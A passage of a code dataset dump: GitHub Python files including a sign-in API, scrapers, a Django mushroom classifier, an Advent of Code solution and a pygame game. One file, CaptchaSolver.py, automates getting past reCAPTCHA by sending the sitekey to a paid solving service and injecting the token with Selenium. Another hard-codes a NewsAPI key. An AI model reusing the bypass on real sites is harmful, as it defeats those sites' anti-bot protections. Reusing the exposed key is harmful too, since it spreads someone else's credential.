req.context['result'] = {\n 'action': 'get signin',\n 'result': 'failure',\n 'error': 'wrong user'\n }\n resp.status = falcon.HTTP_401\n","repo_name":"ECGHelloWorld/PhoenixNowBackend","sub_path":"signins.py","file_name":"signins.py","file_ext":"py","file_size_in_byte":2622,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"69919330088","text":"from google.appengine.ext import ndb\nfrom google.appengine.ext.ndb import msgprop\nfrom protorpc import messages\n\n\nclass Status(messages.Enum):\n \"\"\"Query status.\"\"\"\n Pending = 0\n Working = 1\n Done = 2\n Cancelled = 3\n\n\nclass Method(ndb.Model):\n \"\"\"Experiment method.\"\"\"\n qid = ndb.IntegerProperty()\n version = ndb.IntegerProperty()\n query = ndb.StringProperty()\n status_ids = ndb.IntegerProperty(repeated=True)\n\n\nclass Query(ndb.Model):\n \"\"\"Query details.\"\"\"\n query = ndb.StringProperty()\n uid = ndb.IntegerProperty()\n email = ndb.StringProperty(indexed=False)\n created = ndb.DateTimeProperty(auto_now_add=True, indexed=False)\n updated = ndb.DateTimeProperty(auto_now=True)\n status = msgprop.EnumProperty(Status, default=Status.Pending)\n status_msg = ndb.StringProperty(indexed=False)\n hashtags = ndb.StringProperty(repeated=True, indexed=False)\n keywords = ndb.StringProperty(repeated=True, indexed=False)\n methods = ndb.KeyProperty(kind=Method, repeated=True)\n\n\nclass Stopword(ndb.Model):\n token = ndb.StringProperty()\n\n\nclass Feedback(ndb.Model):\n \"\"\"Feedback for a particular query.\n 1: interesting, 0: neutral -1: not interesting.\n \"\"\"\n qid = ndb.IntegerProperty()\n uid = ndb.IntegerProperty()\n sid = ndb.IntegerProperty()\n score = ndb.IntegerProperty(indexed=False, choices=[-1, 0, 1])\n","repo_name":"Bekt/tweetement","sub_path":"src/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1381,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"17869542203","text":"#!/usr/bin/python3\r\nimport tkinter as tk\r\nimport tkinter.messagebox as mb\r\ntop = tk.Tk()\r\ntop.geometry(\"800x500\")\r\ntop.title(\"test app\")\r\ndef camerafunction():\r\n import numpy as np\r\n import cv2 as cv\r\n cap = cv.VideoCapture(0)\r\n # if not cap.isOpened():\r\n # print(\"Cannot open camera\")\r\n # exit()\r\n while True:\r\n # Capture frame-by-frame\r\n ret, frame = cap.read()\r\n frame = cv.flip(frame, 1)\r\n # if frame is read correctly ret is True\r\n if not ret:\r\n print(\"Can't receive frame (stream end?). 
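The nested lat/lon "if" ladder in the signins.py record is a bounding-box membership test; it reads more directly as one chained comparison. A sketch using the record's hard-coded coordinates:

```python
# True when (lat, lon) falls inside the campus rectangle from signins.py.
def on_campus(lat, lon):
    return (-79.8921061 <= lon <= -79.8833942
            and 36.0903956 <= lat <= 36.0984408)

print(on_campus(36.095, -79.888))  # True: inside both ranges
print(on_campus(36.095, -79.900))  # False: longitude out of range
```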
Exiting ...\")\r\n break\r\n # Our operations on the frame come here\r\n gray = cv.cvtColor(frame, cv.COLOR_BGR2GRAY)\r\n # Display the resulting frame\r\n cv.imshow('frame', gray)\r\n if cv.waitKey(1) == ord('q'):\r\n break\r\n # When everything done, release the capture\r\n cap.release()\r\n cv.destroyAllWindows()\r\n\r\nB = tk.Button(top, text =\"Hello\", command = camerafunction)\r\nB.pack()\r\ntop.mainloop()","repo_name":"Sapitorico/Real_time_object_detection","sub_path":"test_files/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":981,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"17579950249","text":"\n# coding: utf-8\n\n# In[1]:\n\n\nimport requests\nimport csv\nfrom bs4 import BeautifulSoup\n\n\n# In[147]:\n\n\nmname,mrating,myear=list(),list(),list()\n\n\n# In[72]:\n\n\nresponse=requests.get(\"http://www.imdb.com/chart/top\")\n\n\n# In[74]:\n\n\nsoup=BeautifulSoup(response.text,'lxml')\n\n\n# In[112]:\n\n\nname=soup.select('td.titleColumn')\nrating=soup.find_all('strong')\nyear=soup.find_all(class_=\"secondaryInfo\")\n\n\n# In[148]:\n\n\nfor a,b,c in zip(name,rating,year):\n mname.append(a.get_text()[16:])\n mrating.append(b.get('title')[0:3])\n myear.append(c.get_text()[1:5])\n\n\n# In[150]:\n\n\nwith open(\"imdb_top250_movies.csv\",\"w\",encoding='utf-8',newline=\"\") as f:\n writer=csv.writer(f)\n writer.writerow([\"Name\",\"Rating\",\"Year\"])\n for a,b,c in zip(mname,mrating,myear):\n writer.writerow([a,b,c])\n\n","repo_name":"aryengoyal/Web-Scrapping","sub_path":"Top_250Movies.py","file_name":"Top_250Movies.py","file_ext":"py","file_size_in_byte":790,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"1363306731","text":"import math \n\n# class DecimalToRomanNumeral():\n# order = [1000,500,100,50,10,5,1]\n# # in words\n# def __init__(self,number):\n# self.number = number\n# self.roman = \"\"\n# # in symbols\n# def convert(self):\n# while(self.number>=1000):\n# self.roman+=\"M\"\n# self.number-=1000\n# while(self.number>=500):\n# self.roman+=\"D\"\n# self.number-=500\n# while(self.number>=100):\n# self.roman+=\"C\"\n# self.number-=100 \n# while(self.number>=50):\n# self.roman+=\"L\"\n# self.number-=50\n# while(self.number>=10):\n# self.roman+=\"X\"\n# self.number-=10\n# while(self.number>=5):\n# self.roman+=\"V\"\n# self.number-=5 \n# while(self.number>=1):\n# self.roman+=\"I\"\n# self.number-=1 \n\n# return self.roman\n\nclass DecimalToRomanNumeral():\n numerals = {1000:\"M\",500:\"D\",100:\"C\",50:\"L\",10:\"X\",5:\"V\",1:\"I\"}\n words = {\n 0:\"\",\n 1:\"One\",\n 2:\"Two\",\n 3:\"Three\",\n 4:\"Four\",\n 5:\"Five\",\n 6:\"Six\",\n 7:\"Seven\",\n 8:\"Eight\",\n 9:\"Nine\",\n 10:\"Ten\",\n 11:\"Eleven\",\n 12:\"Twelve\",\n 13:\"Thirteen\",\n 14:\"Fourteen\",\n 15:\"Fifteen\",\n 16:\"Sixteen\",\n 17:\"Seventeen\",\n 18:\"Eighteen\",\n 19:\"Nineteen\",\n 20:\"Twenty\",\n 30:\"Thirty\",\n 40:\"Forty\",\n 50:\"Fifty\",\n 60:\"Sixty\",\n 70:\"Seventy\",\n 80:\"Eighty\",\n 90:\"Ninety\"\n }\n # in words\n def __init__(self,number):\n self.orig_number = number\n self.number = number\n self.roman = \"\"\n self.thousand_word = \"\"\n self.hundred_word = \"\"\n # in symbols\n def convert(self):\n for key, value in (self.numerals).items():\n while(self.number>=key):\n self.roman+=value\n self.number-=key\n \n return self.roman\n\n def displayInWords(self):\n self.number = self.orig_number\n self.thousands = math.floor(self.number/1000)\n 
self.hundreds = math.floor((self.number%1000)/100)\n self.tens = math.floor(self.number%100)\n if self.thousands == 0:\n pass\n else:\n self.thousand_word = \"thousand\"\n if self.hundreds == 0:\n pass\n else:\n self.hundred_word = \"-hundred\"\n\n if self.tens<=20 or self.tens in [20,30,40,50,60,70,80,90]: \n return f\"\"\"{self.words[self.thousands]} {self.thousand_word} \n {self.words[self.hundreds]}{self.hundred_word} \n {self.words[self.tens]}\"\"\"\n elif self.tens>20:\n self.tens = math.floor((self.number%100)/10)*10\n self.ones = math.floor(self.number%10)\n return f\"\"\"{self.words[self.thousands]} {self.thousand_word} \n {self.words[self.hundreds]}{self.hundred_word} \n {self.words[self.tens]} {self.words[self.ones]}\"\"\"\n\ndecimal = int(input(\"Enter a decimal number: \"))\nconverter = DecimalToRomanNumeral(decimal)\nprint(converter.convert())\nprint(converter.displayInWords())","repo_name":"roycechua/advanced-python-programming","sub_path":"classes_exercise2.py","file_name":"classes_exercise2.py","file_ext":"py","file_size_in_byte":3421,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"} +{"seq_id":"43993307692","text":"from django.http import JsonResponse\nfrom rest_framework import viewsets\nfrom rest_framework.decorators import api_view\nfrom rest_framework.response import Response\nfrom .serializers import MushroomSerializer\nfrom .models import Mushroom\nfrom django.views.decorators.csrf import csrf_exempt, ensure_csrf_cookie\nfrom fastai.vision.all import load_learner\nimport numpy as np\nimport cv2\n\nlearn = load_learner(\"./model/model_v1.25.pkl\")\nlabels = learn.dls.vocab\n\n# Create your views here.\n\n\nclass MushroomViewSet(viewsets.ModelViewSet):\n queryset = Mushroom.objects.all()\n serializer_class = MushroomSerializer\n\n\n@api_view(['GET'])\ndef search_mushrooms(request):\n name = request.query_params.get('name', '')\n mushrooms = Mushroom.objects.filter(name__icontains=name)\n serializer = MushroomSerializer(mushrooms, many=True)\n return Response(serializer.data)\n\n\n@csrf_exempt\ndef predict_mushroom(request):\n try:\n # Read binary data from request body\n img_data = request.body\n\n # Convert binary data to numpy array\n img_array = np.frombuffer(img_data, np.uint8)\n\n # Decode the numpy array as an image using OpenCV\n img = cv2.imdecode(img_array, cv2.IMREAD_COLOR)\n pred, pred_idx, probs = learn.predict(img)\n # get the top 5 predictions\n mashed_ = []\n for mushroom_, prob in zip(learn.dls.vocab, probs):\n mashed_.append({'mushroom': mushroom_, 'probability': prob.item()})\n sorted_mashed = sorted(\n mashed_, key=lambda x: x['probability'], reverse=True)\n top_5_mushrooms = sorted_mashed[:5]\n\n # print(top_5_mushrooms[0].get('mushroom'))\n JsonRes = []\n\n\n for i in range(5):\n mushroom = Mushroom.objects.filter(\n s_name__icontains=top_5_mushrooms[i].get('mushroom'))\n serializer = MushroomSerializer(mushroom, many=True)\n\n if serializer.data: # Check if the queryset is not empty\n JsonRes.append(\n {\n 'predicted_id': serializer.data[0]['id'],\n 'predicted_name': serializer.data[0]['name'],\n 'name': top_5_mushrooms[i].get('mushroom'),\n 'probability': top_5_mushrooms[i].get('probability')\n }\n )\n else:\n JsonRes.append(\n {\n 'predicted_id': None,\n 'predicted_name': \"Not currently in database\",\n 'name': top_5_mushrooms[i].get('mushroom'),\n 'probability': top_5_mushrooms[i].get('probability')\n }\n )\n\n return JsonResponse(JsonRes, safe=False)\n except Exception as e:\n return 
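The symbol table in the classes_exercise2.py record has only the seven plain numerals, so convert() emits additive forms such as MDCCCCLXXXVII for 1987. A self-contained sketch of the standard subtractive variant, which differs only by the extra 900/400/90/40/9/4 pairs:

```python
# Greedy conversion over a value-ordered table, including subtractive pairs.
PAIRS = [(1000, "M"), (900, "CM"), (500, "D"), (400, "CD"),
         (100, "C"), (90, "XC"), (50, "L"), (40, "XL"),
         (10, "X"), (9, "IX"), (5, "V"), (4, "IV"), (1, "I")]

def to_roman(number):
    roman = ""
    for value, symbol in PAIRS:
        while number >= value:
            roman += symbol
            number -= value
    return roman

print(to_roman(1987))  # MCMLXXXVII
```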
JsonResponse({'error': str(e)}, status=400)\n\n\n@csrf_exempt\ndef predict_more_mushroom(request):\n try:\n if request.method == 'POST':\n # Initialize an empty dictionary to store cumulative probabilities\n cumulative_probabilities = {}\n\n # Iterate through the uploaded files\n num_images = 0\n for key in request.FILES:\n img_file = request.FILES[key]\n img_data = img_file.read()\n img_array = np.frombuffer(img_data, np.uint8)\n img = cv2.imdecode(img_array, cv2.IMREAD_COLOR)\n\n pred, pred_idx, probs = learn.predict(img)\n\n # Update the cumulative probabilities\n for mushroom_, prob in zip(learn.dls.vocab, probs):\n if mushroom_ in cumulative_probabilities:\n cumulative_probabilities[mushroom_] += prob.item()\n else:\n cumulative_probabilities[mushroom_] = prob.item()\n\n num_images += 1\n\n # Calculate the average probabilities\n average_probabilities = {mushroom_: (cumulative_prob / num_images) for mushroom_, cumulative_prob in cumulative_probabilities.items()}\n\n # Get the top 5 results based on the average probabilities\n sorted_probabilities = sorted(average_probabilities.items(), key=lambda x: x[1], reverse=True)\n top_5_mushrooms = sorted_probabilities[:5]\n print(average_probabilities)\n\n # ... Add the rest of your code here to return the JsonResponse\n # ... (as in your original predict_mushroom function)\n JsonRes = []\n for i in range(5):\n mushroom = Mushroom.objects.filter(\n s_name__icontains=top_5_mushrooms[i][0])\n serializer = MushroomSerializer(mushroom, many=True)\n\n if serializer.data: # Check if the queryset is not empty\n JsonRes.append(\n {\n 'predicted_id': serializer.data[0]['id'],\n 'predicted_name': serializer.data[0]['name'],\n 'name': top_5_mushrooms[i][0],\n 'probability': top_5_mushrooms[i][1],\n }\n )\n else:\n JsonRes.append(\n {\n 'predicted_id': None,\n 'predicted_name': \"Not currently in database\",\n 'name': top_5_mushrooms[i][0],\n 'probability': top_5_mushrooms[i][1],\n }\n )\n return JsonResponse(JsonRes, safe=False)\n except Exception as e:\n return JsonResponse({'error': str(e)}, status=400)\n","repo_name":"jkhammerseth/shroomyApp","sub_path":"backend/mushroomIdentifyer/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5648,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"41534698842","text":"import requests\nimport json\nfrom random import*\n\ntheme = [\"jaunes\", \"gilets\", \"sport\", \"brexit\", \"climat\"]\nN=choice(theme)\nchoisi=[]\nchoisi.append(N)\nprint(choisi)\n \nf = open('ARTICLES.txt','w')\n \nurl='https://newsapi.org/v2/everything?sources=le-monde&apiKey=30274f542d134b74a8e47c88110d11e0'\ndata_raw = requests.get(url).json() #articles récents\n \n \ndel data_raw[\"status\"]\ndel data_raw[\"totalResults\"]\n \narticles = data_raw.get('articles')\n \nliste1 =[]\nliste2 =[]\n \nfor data in articles:\n for key, value in data.items():\n if (key == 'title'):\n liste1.append(value)\n elif(key=='content'):\n liste2.append(value)\n \n \nfor i in range (len(liste1)):\n if ('jaunes' in liste1[i]):\n f.write(\"TITRE : \"+liste1[i]+\"\\n\"+\"CONTENU : \"+liste2[i]+\"\\n\\n\\n\")\nf.close()\n\n\nprint(f)","repo_name":"ManonFrl/fakenews","sub_path":"fkn.py","file_name":"fkn.py","file_ext":"py","file_size_in_byte":814,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"37517600853","text":"#! 
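predict_more_mushroom in the views.py record sums per-class probabilities across the uploaded images and divides by the image count before ranking. A plain-Python sketch of that averaging step, with two made-up score dictionaries standing in for the fastai predictions:

```python
# Average per-class scores over several images, then take the top entries.
per_image_probs = [
    {"amanita": 0.7, "boletus": 0.2, "morel": 0.1},
    {"amanita": 0.5, "boletus": 0.4, "morel": 0.1},
]
cumulative = {}
for probs in per_image_probs:
    for name, p in probs.items():
        cumulative[name] = cumulative.get(name, 0.0) + p
average = {name: total / len(per_image_probs) for name, total in cumulative.items()}
top = sorted(average.items(), key=lambda kv: kv[1], reverse=True)[:2]
print(top)  # [('amanita', 0.6), ('boletus', 0.30000000000000004)]
```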
/usr/bin/env python3\n\n#####################################################\n# The example shows how to extract a line scan data #\n# from a StreamLine HR measurement #\n#####################################################\n\nimport numpy as np\nfrom renishawWiRE import WDFReader\nfrom _path import curdir, imgdir\n\ntry:\n import matplotlib.pyplot as plt\n\n plot = True\nexcept ImportError:\n plot = False\n\n\ndef main():\n filename = curdir / \"spectra_files\" / \"line.wdf\"\n reader = WDFReader(filename)\n assert reader.measurement_type == 3\n\n # For mapping, xdata is still wavenumber\n wn = reader.xdata\n spectra = reader.spectra\n assert wn.shape[0] == spectra.shape[1]\n # Now spectra.shape becomes (i, j, spectrum)\n print(wn.shape, spectra.shape)\n if plot is True:\n # Level the spectra with baseline intensity\n spectra = spectra - spectra.min(axis=1, keepdims=True)\n # Need to revert matrix for plotting\n spectra = spectra.T\n plt.figure(figsize=(6, 4))\n # plot the first 5 spectra\n for i in range(5):\n plt.plot(wn, spectra[:, i], label=\"{0:d}\".format(i))\n plt.legend()\n plt.xlabel(\"Wavenumber (1/cm)\")\n plt.ylabel(\"Intensity (ccd counts)\")\n plt.title(\"Spectra from line.wdf\")\n plt.show(block=False)\n plt.pause(3)\n plt.tight_layout()\n plt.savefig(imgdir / \"linscan.png\", dpi=100)\n plt.close()\n else:\n print(\"Wavenumber is like:\", wn)\n print(\"Spectra matrix is like: \\n\", spectra)\n\n return\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"alchem0x2A/py-wdf-reader","sub_path":"examples/ex3_linscan.py","file_name":"ex3_linscan.py","file_ext":"py","file_size_in_byte":1616,"program_lang":"python","lang":"en","doc_type":"code","stars":33,"dataset":"github-code","pt":"53"} +{"seq_id":"71162516009","text":"import requests\nimport config\nimport re\nimport string\nimport urllib.parse\n\nfrom lxml import etree, html\nfrom time import sleep\nfrom selenium import webdriver\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium.webdriver.support.ui import Select\nfrom selenium.webdriver.support import expected_conditions as ec\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.ui import WebDriverWait\n\ndef captchaReader(htmlContent):\n return html.fromstring(htmlContent).xpath('string(//*[@data-sitekey]/@data-sitekey)')\n\ndef captchaResult(args, headers):\n task = re.search('OK\\|(?P.+)', args)\n if task is None:\n raise Exception(args)\n url = 'http://2captcha.com/res.php'\n querystring = {\"key\":config.apiKey,\"action\":\"get\",\"id\":task['id']}\n while True:\n sleep(5)\n result = requests.request(\"POST\", url, headers=headers, params=querystring).text\n if result == 'ERROR_CAPTCHA_UNSOLVABLE':\n raise Exception(result)\n if result != 'CAPCHA_NOT_READY':\n return result[3::]\n\ndef solveCaptcha(siteKey, siteUrl):\n url = 'https://2captcha.com/in.php'\n host = '2captcha.com'\n\n querystring = {\"key\":config.apiKey,\"method\":\"userrecaptcha\",\"googlekey\":siteKey,\"pageurl\":siteUrl}\n\n headers = {\n 'Accept': \"*/*\",\n 'Cache-Control': \"no-cache\",\n 'Host': host,\n 'Accept-Encoding': \"gzip, deflate\",\n 'Content-Length': \"0\",\n 'Connection': \"keep-alive\",\n 'cache-control': \"no-cache\"\n }\n\n args = requests.request(\"POST\", url, headers=headers, params=querystring).text\n\n return captchaResult(args, headers)\n\ndef getCaptchaResponse(htmlContent, siteUrl):\n challenge = captchaReader(htmlContent)\n hashResult = solveCaptcha(challenge, siteUrl)\n return hashResult\n\ndef clickAction(url, headers, 
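The leveling step in the ex3_linscan.py record subtracts each spectrum's own minimum; axis=1 with keepdims=True keeps a column shape so the subtraction broadcasts row by row. A tiny sketch with a made-up 2 x 3 spectra matrix:

```python
# Per-row baseline removal: every trace is shifted so its minimum is 0.
import numpy as np

spectra = np.array([[110.0, 130.0, 120.0],
                    [205.0, 240.0, 215.0]])
leveled = spectra - spectra.min(axis=1, keepdims=True)
print(leveled)
# [[ 0. 20. 10.]
#  [ 0. 35. 10.]]
```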
querystring, hashResult):\n driver = webdriver.Chrome()\n #storing the cookies generated by the browser\n request_cookies_browser = driver.get_cookies()\n urlAction = \"{}?{}\".format(url, urllib.parse.urlencode(querystring))\n driver.get(urlAction)\n driver.execute_script('var element=document.getElementById(\"g-recaptcha-response\"); element.style.display=\"\";')\n driver.execute_script('document.getElementById(\"g-recaptcha-response\").innerHTML=\"{}\"'.format(hashResult))\n driver.execute_script('document.getElementById(\"formConsulta\").submit()')\n return driver.page_source","repo_name":"dannncampos/TJSPcrawler","sub_path":"src/Useful/CaptchaSolver.py","file_name":"CaptchaSolver.py","file_ext":"py","file_size_in_byte":2439,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"} +{"seq_id":"1987069349","text":"import math\nimport collections\nimport itertools\nimport re\nimport ast\nimport functools\nfrom collections import defaultdict\nfrom z3 import If, Int, Solver\nfrom z3 import *\nimport copy\n\nT = \"bb.txt\"\nM = \"aa.txt\"\n\nfile1 = open(M, 'r')\nlines = file1.read().splitlines()\nvalves = {}\n\nfor line in lines:\n parts = line.split()\n valve = parts[1]\n flow_rate = int(parts[4][5:-1])\n lead_to = ''.join(parts[9:]).split(',')\n valves[valve] = (flow_rate, lead_to)\n\nvalve_to_num = {}\nfor key in sorted(valves.keys()):\n valve_to_num[key] = 1 << len(valve_to_num)\n\nvalves = {\n valve_to_num[valve]: (flow_rate, tuple(map(valve_to_num.get, lead_to)))\n for valve, (flow_rate, lead_to) in valves.items()\n}\n\ndef part1():\n\n states = [(valve_to_num['AA'], 0, 0)]\n\n best = {}\n\n for t in range(1, 31):\n new_states = []\n for loc, opened, pressure in states:\n key = (loc, opened)\n if key in best and pressure <= best[key]:\n continue\n best[key] = pressure\n flow_rate, lead_to = valves[loc]\n if loc & opened == 0 and flow_rate > 0:\n new_states.append((loc, opened | loc, pressure + flow_rate * (30 - t)))\n for dest in lead_to:\n new_states.append((dest, opened, pressure))\n states = new_states\n print('pt1', max(pressure for a, b, pressure in states))\n\n\npart1()\n","repo_name":"halitanildonmez/advent-of-code-2022","sub_path":"2022/day16/part1.py","file_name":"part1.py","file_ext":"py","file_size_in_byte":1398,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"20589113437","text":"import pygame \r\nimport sys\r\nimport codecs\r\nimport copy\r\nimport ctypes\r\nimport random\r\nimport time\r\nimport os\r\nfrom pygame import mixer\r\n\r\n\r\nwin1 = False\r\nS = True\r\nscore = 0\r\nD = True\r\nR = False\r\nGolos = False\r\ndie = [\"data\\music\\death\\die1.mp3\", \"data\\music\\death\\die2.mp3\"]\r\nfile = [\"data\\music\\gameplay\\gameplay1.mp3\", \"data\\music\\gameplay\\gameplay2.mp3\", \"data\\music\\gameplay\\gameplay3.mp3\", \"data\\music\\gameplay\\gameplay4.mp3\", \"data\\music\\gameplay\\gameplay5.mp3\"]\r\nfile1 = \"data\\music\\menu\\menu.mp3\"\r\ncry = \"data\\music\\cry.mp3\"\r\nbossM = r\"data\\music\\boss.mp3\"\r\nGolosovanie = \"data\\music\\Golosovanie.mp3\"\r\nmixer.init()\r\nGP = [pygame.mixer.Sound('data\\music\\gameplay\\gameplay1.wav')]\r\nmenu = pygame.mixer.Sound('data\\music\\menu\\menu.wav')\r\nWIDTH = 1000\r\nHEIGHT = 600\r\ndead = False\r\nok = False\r\nokx = -273\r\noky = 835\r\ncount = 5\r\nside = 1\r\nk = 1\r\nclock = pygame.time.Clock()\r\nuser32 = ctypes.windll.user32\r\nscreenSize = user32.GetSystemMetrics(0) / 2, user32.GetSystemMetrics(1) 
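The day16 record above assigns each valve a distinct power of two (1 << len(valve_to_num)), so the set of opened valves travels through the search as a single integer. A sketch of that encoding on three dummy valve names:

```python
# Pack a set of valves into one int; membership is a bitwise AND.
valve_to_num = {}
for name in ["AA", "BB", "CC"]:
    valve_to_num[name] = 1 << len(valve_to_num)  # AA=0b001, BB=0b010, CC=0b100

opened = valve_to_num["AA"] | valve_to_num["CC"]  # {AA, CC} == 0b101
print((opened & valve_to_num["AA"]) != 0)  # True: AA already opened
print((opened & valve_to_num["BB"]) != 0)  # False
```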
/ 2\r\nwidth = 80\r\nheight = 110\r\nl = [1000, 600]#[int(i) * 2 for i in screenSize]\r\nl0 = [500, 300]#[int(i) for i in screenSize]\r\nsize = (l)\r\npygame.init()\r\nwin = False\r\npygame.display.set_caption('DavArm')\r\nscreen = pygame.display.set_mode(size)\r\nx = l0[0] - width / 2\r\nx0 = x * 2\r\ny = l0[1] - height / 2 +100\r\nst = [50, 70] \r\nspeed = 8\r\nisJump = False\r\njump = 10\r\nhardmod = False\r\nleft = False\r\nright = False\r\nup = False\r\nanim = 0\r\nbossD = False\r\nlastM = 'right'\r\nface = 'r'\r\nenanim = 0\r\nI = True\r\nS = True\r\nboss1 = False\r\nHat = pygame.image.load(r'data\\Head\\Hat.png')\r\nOk = pygame.image.load(r'data\\prfiles\\Ok.png')\r\ng = [0, 450, 20, 10]\r\nH = [pygame.image.load(r'data\\Head\\MHead.png'), pygame.image.load(r'data\\Head\\AHead.png'), pygame.image.load(r'data\\Head\\DHead.png'), pygame.image.load(r'data\\Head\\ArHead.png')]\r\nBG = pygame.image.load(r'data\\prfiles\\on.png')\r\nwalkR = [pygame.image.load(r'data\\Soldier\\Poses\\rw1.png'), pygame.image.load(r'data\\Soldier\\Poses\\rw2.png')]\r\nwalkL = [pygame.image.load(r'data\\Soldier\\Poses\\lw1.png'), pygame.image.load(r'data\\Soldier\\Poses\\lw2.png')]\r\nwalkYL = [pygame.image.load(r'data\\Soldier\\Poses\\ylfwalk.png'), pygame.image.load(r'data\\Soldier\\Poses\\ylfwalk1.png')]\r\nwalkYR = [pygame.image.load(r'data\\Soldier\\Poses\\yrfwalk.png'), pygame.image.load(r'data\\Soldier\\Poses\\yrfwalk1.png')]\r\nak47L = pygame.image.load(r'data\\Weapons\\ak47L.png')\r\nak47R = pygame.image.load(r'data\\Weapons\\ak47R.png')\r\nBulletL = pygame.image.load(r'data\\Weapons\\BulletL.png')\r\nBulletR = pygame.image.load(r'data\\Weapons\\BulletR.png')\r\nStandAn = pygame.image.load(r'data\\Soldier\\Poses\\s.png')\r\nLJ = pygame.image.load(r'data\\Soldier\\Poses\\lj.png')\r\nRJ = pygame.image.load(r'data\\Soldier\\Poses\\rj.png')\r\nS2 = pygame.image.load(r'data\\Soldier\\Poses\\s2.png')\r\nSS = pygame.image.load(r'data\\Soldier\\Poses\\ss.png')\r\nJL = pygame.image.load(r'data\\Soldier\\Poses\\jl.png')\r\nRZombie1 = [pygame.image.load(r'data\\Zombie\\Poses\\rzombie_action1.png'), pygame.image.load(r'data\\Zombie\\Poses\\rzombie_action2.png')]\r\nLZombie1 = [pygame.image.load(r'data\\Zombie\\Poses\\lzombie_action1.png'), pygame.image.load(r'data\\Zombie\\Poses\\lzombie_action2.png')]\r\nSCR = pygame.image.load(r'data\\prfiles\\scrimer.jpg')\r\nSCR = pygame.transform.scale(SCR, (l[0], l[1]))\r\nBG = pygame.transform.scale(BG, (l[0], l[1]))\r\nV = True\r\n\r\ndef load_image(name, colorkey=None):\r\n fullname = os.path.join('data', name)\r\n try:\r\n image = pygame.image.load(fullname)\r\n except pygame.error as message:\r\n print('Cannot load image:', name)\r\n raise SystemExit(message)\r\n image = image.convert_alpha()\r\n if colorkey is not None:\r\n if colorkey is -1:\r\n colorkey = image.get_at((0, 0))\r\n image.set_colorkey(colorkey)\r\n return image\r\n\r\n \r\n \r\n \r\n \r\n \r\n \r\nclass Enemy(pygame.sprite.Sprite):\r\n\r\n image = load_image(r'Zombie\\Poses\\rzombie_action1.png')\r\n def __init__(self, x, y, l, group):\r\n super().__init__(group)\r\n self.x, self.y = x, y\r\n self.size = l\r\n self.image = Enemy.image\r\n self.vel=10\r\n self.y1 = random.randint(self.size[1] / 2, self.size[1]-100)\r\n self.ch = random.randint(0,1)\r\n self.vel = 7\r\n if self.ch == 1:\r\n self.x1 = -50 \r\n else:\r\n self.x1 = l[0]\r\n self.anim = 0\r\n self.head = 0\r\n \r\n \r\n \r\n def RN(self):\r\n x1 = random.randint(self.size[0], self.size[0])\r\n y1 = random.randint(0, (self.size[1]) / 2)\r\n 
return x0, y0\r\n def move(self):\r\n self.y1+=10\r\n\r\n def draw(self, screen, x, R):\r\n if self.anim + 1 >= 20:\r\n self.anim = 0 \r\n if self.head + 1 >= 20:\r\n self.head = 0 \r\n if not(R):\r\n if self.x1 <= x:\r\n screen.blit(RZombie1[self.anim // 10], (self.x1, self.y1))\r\n self.anim += 1\r\n if self.x1 > x:\r\n screen.blit(LZombie1[self.anim // 10], (self.x1, self.y1)) \r\n self.anim += 1\r\n else:\r\n screen.blit(H[self.head // 10], (self.x1, self.y1))\r\n self.head += 1\r\n \r\n\r\n\r\n\r\nclass snaryad():\r\n\r\n def __init__(self, x, y, facing):\r\n self.x = x\r\n self.y = y\r\n self.facing = facing\r\n self.vel = 30 * facing\r\n\r\n def draw(self, screen):\r\n if self.facing == -1:\r\n screen.blit(BulletL, (self.x, self.y))\r\n if self.facing == 1:\r\n screen.blit(BulletR, (self.x, self.y))\r\n\r\nclass Boss():\r\n def __init__(self, l0):\r\n self.x = l0[0]\r\n self.y = l0[1]\r\n self.vel = 15\r\n self.heal = 100\r\n self.font = pygame.font.Font(None, 30) \r\n self.text = self.font.render(\"Thief\",True, (255, 0, 0)) \r\n def draw(self):\r\n screen.blit(self.text, (self.x, self.y - 40)) \r\n pygame.draw.rect(screen, (255, 0, 0), (self.x, self.y - 20, 100, 20))\r\n pygame.draw.rect(screen, (0, 255, 0), (self.x, self.y - 20, 100 - (100 - self.heal), 20))\r\n screen.blit(H[3], (self.x, self.y)) \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\ndef drawWin():\r\n global R\r\n global anim\r\n global face\r\n global okx\r\n global oky\r\n screen.fill((0, 0, 0))\r\n pygame.draw.rect(screen, (30, 30, 30), (0, 330, 1000, 270))\r\n pygame.draw.circle(screen, (255, 255, 255), (160, 60), 5) \r\n pygame.draw.circle(screen, (255, 255, 255), (400, 244), 5) \r\n pygame.draw.circle(screen, (255, 255, 255), (327, 180), 5) \r\n pygame.draw.circle(screen, (255, 255, 255), (400, 130), 5) \r\n pygame.draw.circle(screen, (255, 255, 255), (500, 200), 5) \r\n pygame.draw.circle(screen, (255, 255, 255), (320, 85), 5) \r\n pygame.draw.circle(screen, (255, 255, 255), (240, 70), 5) \r\n pygame.draw.circle(screen, (255, 255, 255), (40, 60), 5) \r\n pygame.draw.circle(screen, (255, 255, 255), (600, 280), 5) \r\n pygame.draw.circle(screen, (255, 255, 255), (100, 250), 5) \r\n pygame.draw.circle(screen, (255, 255, 255), (750, 140), 5) \r\n pygame.draw.circle(screen, (255, 255, 255), (670, 100), 5) \r\n pygame.draw.circle(screen, (155, 155, 155), (900, 100), 60) \r\n pygame.draw.circle(screen, (255, 255, 255), (920, 120), 10) \r\n pygame.draw.circle(screen, (255, 255, 255), (885, 85), 7) \r\n st[0], st[1] = 